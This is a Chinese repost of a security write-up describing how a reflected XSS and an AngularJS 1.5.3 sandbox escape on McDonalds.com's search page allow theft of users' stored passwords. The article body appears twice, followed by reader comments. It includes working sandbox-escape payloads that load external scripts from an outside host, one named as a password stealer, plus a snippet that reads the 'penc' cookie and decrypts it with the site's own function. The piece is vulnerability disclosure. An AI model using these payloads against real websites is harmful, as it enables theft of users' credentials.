看我如何利用漏洞窃取麦当劳网站注册用户密码
2017-01-19 21:48
771 查看
本文讲述了利用不安全的加密存储(Insecure_Cryptographic_Storage)漏洞和服务端反射型XSS漏洞,实现对麦当劳网站(McDonalds.com)注册用户的密码窃取,进一步测试,还可能获取到网站注册用户的更多信息。
POC-利用反射型XSS漏洞绕过AngularJS框架沙箱
麦当劳网站McDonalds.com设置有一个搜索页面,该页面存在XSS反射型漏洞,可以返回搜索参数值,假设搜索参数q为***********-test-reflected-test-***********,对应链接:
https://www.mcdonalds.com/us/en-us/search-results.html?q=***********-test-reflected-test-***********
则执行效果如下:
麦当劳网站采用AngularJS框架,所以可以使用特殊字符在搜索区域进行返回值尝试。通过更改搜索参数q为{{$id}}之后,发现返回值对应AngularJS范围内的对应ID数字9:
Link used: https://www.mcdonalds.com/us/en-us/search-results.html?q={{$id}}
AngularJS是一个流行的JavaScript框架,通过这个框架可以把表达式放在花括号中嵌入到页面中。例如,表达式1+2={{1+2}}将会得到1+2=3。其中括号中的表达式被执行了,这就意味着,如果服务端允许用户输入的参数中带有花括号,我们就可以用Angular表达式来进行xss攻击。
由于AngularJS工作在沙箱模式,所以使用参数{{alert(1)}}无任何返回信息,但这并不代表AngularJS沙箱没有漏洞。在
AngularJS1.6版本中,由于沙箱机制不能很好地起到安全防护目的,已经被从源码中移除。而PortSwigger还对AngularJS的各版本沙箱进行了绕过测试,并给出了相应绕过执行命令。
在这里,我们来看看McDonalds.com使用的AngularJS版本,通过在浏览器控制端输入angular.version命令:
可以发现AngularJS为1.5.3版本,参照PortSwigger的测试,我们选用
作为搜索参数,很惊喜,返回值如下:
这就意味着,我们可以利用绕过命令,对网站加载外部JS脚本文件,如构造如下命令:
返回结果如下:
在内容安全策略(Content-Security-Policy)的提示下,第三方脚本文件被成功加载。
在该页面的源代码页面,包含了各种passowrd字段内容,甚至存在一个有趣的密码解密函数:
最危险的是,利用该解密函数代码竟然可以实现对客户端或双向加密存储的密码破解。尝试对发现的被存储Cookie值penc进行解密,竟然成功了!
而且,经分析发现,Cookie值penc的存储期限是大大的一年!LOL!
另外,以下的源码分析显示,麦当劳网站使用了Javascript的CryptoJS加密库进行信息加密,加密方式为3DES,其中加密参数key和iv都为通用,这意味着只需要获取到cookie值就能对密码解密:
由于AngularJS沙箱绕过方法只对charAt的join方法(charAt=[].join;$eval(‘x=alert(1)’))有效,所以即使我曾尝试在搜索区域构造其它恶意命令对cookie信息进行解密,但最终总是因为getCookie失败而无效。只有当charAt(0) 不为空时,getCookie才有返回值:
最后,我写了一段调用麦当劳网站首页框架进行cookie窃取的脚本,为了避免脚本因AngularJS沙箱被绕过而被反复执行,所以,我用window.xssIsExecuted对其进行了显示控制,如下:
if (!window.xssIsExecuted) {
window.xssIsExecuted = true;
var iframe = $('<iframe src="https://www.mcdonalds.com/us/en-us.html"></iframe>');
$('body').append(iframe);
iframe.on('load', function() {
var penc = iframe[0].contentWindow.getCookie('penc');
alert(iframe[0].contentWindow.decrypt(penc));
});
}
最终,配合以下AngularJS沙箱绕过命令,可以成功从cookie信息中对密码解密!
遗憾的是,我曾多次与麦当劳官方就此问题进行联系,但是他们竟然都不回应!@#%¥&! ,所以我选择把此漏洞公开。
**参考来源:finnwea.com,FB小编clouds编译,转载请注明来自FreeBuf.COM。
clouds88篇文章等级:7级
|
|
上一篇:针对NETFLIX的新型钓鱼攻击的精妙之处
下一篇:本篇已是最新文章
大蝉 回复
弱弱的问一句,不靠其他漏洞配合,你这个除了窃取你自己密码还能窃取谁密码?
)26(
亮了
发表评论
大蝉 2017-01-18
回复
1楼
弱弱的问一句,不靠其他漏洞配合,你这个除了窃取你自己密码还能窃取谁密码?
亮了(26)
clouds
(7级) Ms. Robot
2017-01-18 回复
@ 大蝉 文章的最大意图在于,提醒网站针对注册用户密码和其它相关信息,应该采用适当加密存储机制。当然,从漏洞本身来说,其存在不仅仅是代表其存在而已。
亮了(0)
大蝉 2017-01-18
回复
@ clouds 大神,你这分析写的不错,可是咱标题能不能别起这么大?大家都是奔着看脱裤来的,你就给看个反射xss加解密?不合适吧
亮了(5)
clouds
(7级) Ms. Robot
2017-01-19 回复
@ 大蝉 Stealing passwords from McDonald’s users,原文是这样的
亮了(0)
clouds
(7级) Ms. Robot
2017-01-19 回复
@ 大蝉 还有嘛,大家都希望看到不穿裤子的长腿美女,但有时候,看看思路或许才能去脱别人裤子。
亮了(0)
tt 2017-01-18
回复
2楼
确实没啥用!
亮了(2)
andy88
(5级) 我相信我加入互联网,就是我未来的路、希望有大神关注http:...
2017-01-18 回复
3楼
类似的玩过
亮了(1)
美食家L
(3级) https://404.so~( TロT)σ 别碰我~
2017-01-18 回复
4楼
沦落至此
亮了(2)
cafexss
(4级) root@localhost
2017-01-18 回复
5楼
因吹斯听
亮了(1)
POC-利用反射型XSS漏洞绕过AngularJS框架沙箱
麦当劳网站McDonalds.com设置有一个搜索页面,该页面存在XSS反射型漏洞,可以返回搜索参数值,假设搜索参数q为***********-test-reflected-test-***********,对应链接:https://www.mcdonalds.com/us/en-us/search-results.html?q=***********-test-reflected-test-***********
则执行效果如下:
麦当劳网站采用AngularJS框架,所以可以使用特殊字符在搜索区域进行返回值尝试。通过更改搜索参数q为{{$id}}之后,发现返回值对应AngularJS范围内的对应ID数字9:
Link used: https://www.mcdonalds.com/us/en-us/search-results.html?q={{$id}}
AngularJS是一个流行的JavaScript框架,通过这个框架可以把表达式放在花括号中嵌入到页面中。例如,表达式1+2={{1+2}}将会得到1+2=3。其中括号中的表达式被执行了,这就意味着,如果服务端允许用户输入的参数中带有花括号,我们就可以用Angular表达式来进行xss攻击。
由于AngularJS工作在沙箱模式,所以使用参数{{alert(1)}}无任何返回信息,但这并不代表AngularJS沙箱没有漏洞。在
AngularJS1.6版本中,由于沙箱机制不能很好地起到安全防护目的,已经被从源码中移除。而PortSwigger还对AngularJS的各版本沙箱进行了绕过测试,并给出了相应绕过执行命令。
在这里,我们来看看McDonalds.com使用的AngularJS版本,通过在浏览器控制端输入angular.version命令:
可以发现AngularJS为1.5.3版本,参照PortSwigger的测试,我们选用
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
作为搜索参数,很惊喜,返回值如下:
这就意味着,我们可以利用绕过命令,对网站加载外部JS脚本文件,如构造如下命令:
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/external-alert.js`)');}}`
返回结果如下:
窃取密码
除此之外,我在麦当劳网站的注册页面发现了复选框“Remember my password”,通常来说,这只有在用户登录页面才存在,有点奇怪:在该页面的源代码页面,包含了各种passowrd字段内容,甚至存在一个有趣的密码解密函数:
最危险的是,利用该解密函数代码竟然可以实现对客户端或双向加密存储的密码破解。尝试对发现的被存储Cookie值penc进行解密,竟然成功了!
而且,经分析发现,Cookie值penc的存储期限是大大的一年!LOL!
另外,以下的源码分析显示,麦当劳网站使用了Javascript的CryptoJS加密库进行信息加密,加密方式为3DES,其中加密参数key和iv都为通用,这意味着只需要获取到cookie值就能对密码解密:
由于AngularJS沙箱绕过方法只对charAt的join方法(charAt=[].join;$eval(‘x=alert(1)’))有效,所以即使我曾尝试在搜索区域构造其它恶意命令对cookie信息进行解密,但最终总是因为getCookie失败而无效。只有当charAt(0) 不为空时,getCookie才有返回值:
最后,我写了一段调用麦当劳网站首页框架进行cookie窃取的脚本,为了避免脚本因AngularJS沙箱被绕过而被反复执行,所以,我用window.xssIsExecuted对其进行了显示控制,如下:
if (!window.xssIsExecuted) {
window.xssIsExecuted = true;
var iframe = $('<iframe src="https://www.mcdonalds.com/us/en-us.html"></iframe>');
$('body').append(iframe);
iframe.on('load', function() {
var penc = iframe[0].contentWindow.getCookie('penc');
alert(iframe[0].contentWindow.decrypt(penc));
});
}
最终,配合以下AngularJS沙箱绕过命令,可以成功从cookie信息中对密码解密!
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/mcdonalds-password-stealer.js`)');}}
遗憾的是,我曾多次与麦当劳官方就此问题进行联系,但是他们竟然都不回应!@#%¥&! ,所以我选择把此漏洞公开。
**参考来源:finnwea.com,FB小编clouds编译,转载请注明来自FreeBuf.COM。
clouds88篇文章等级:7级
|
|
上一篇:针对NETFLIX的新型钓鱼攻击的精妙之处
下一篇:本篇已是最新文章
这些评论亮了
大蝉 回复
弱弱的问一句,不靠其他漏洞配合,你这个除了窃取你自己密码还能窃取谁密码?
)26(
亮了
发表评论
已有 9 条评论
大蝉 2017-01-18
回复
1楼
弱弱的问一句,不靠其他漏洞配合,你这个除了窃取你自己密码还能窃取谁密码?
亮了(26)
clouds
(7级) Ms. Robot
2017-01-18 回复
@ 大蝉 文章的最大意图在于,提醒网站针对注册用户密码和其它相关信息,应该采用适当加密存储机制。当然,从漏洞本身来说,其存在不仅仅是代表其存在而已。
亮了(0)
大蝉 2017-01-18
回复
@ clouds 大神,你这分析写的不错,可是咱标题能不能别起这么大?大家都是奔着看脱裤来的,你就给看个反射xss加解密?不合适吧
亮了(5)
clouds
(7级) Ms. Robot
2017-01-19 回复
@ 大蝉 Stealing passwords from McDonald’s users,原文是这样的
亮了(0)
clouds
(7级) Ms. Robot
2017-01-19 回复
@ 大蝉 还有嘛,大家都希望看到不穿裤子的长腿美女,但有时候,看看思路或许才能去脱别人裤子。
亮了(0)
tt 2017-01-18
回复
2楼
确实没啥用!
亮了(2)
andy88
(5级) 我相信我加入互联网,就是我未来的路、希望有大神关注http:...
2017-01-18 回复
3楼
类似的玩过
亮了(1)
美食家L
(3级) https://404.so~( TロT)σ 别碰我~
2017-01-18 回复
4楼
沦落至此
亮了(2)
cafexss
(4级) root@localhost
2017-01-18 回复
5楼
因吹斯听
亮了(1)
相关文章推荐
- Spark架构及运算逻辑
- 【转】100亿数据1万属性数据架构设计
- JavaEE体系架构概述
- PHP网站资源
- vSphere体系架构
- 用IIS发布网站
- 基于keepalived的高可用ipvs集群
- 常用集群架构实战练习篇 推荐
- 架构师需要了解的Paxos原理、历程及实战
- 春节期间访问网站,网站自动提示假期祝福框
- 分享网站文章到微信朋友圈,缩略图怎么设置
- 如何构建高扩展性网站?
- 看我如何利用漏洞窃取麦当劳网站注册用户密码
- 【设计】——收集一些设计感很强的网站模板
- 架构之美读书笔记01
- 网站链接
- HDFS架构
- 企业高可用切换的说明
- 视频电商网站实战 - 构建视频提交页面(上)
- 网站微信扫码支付java开发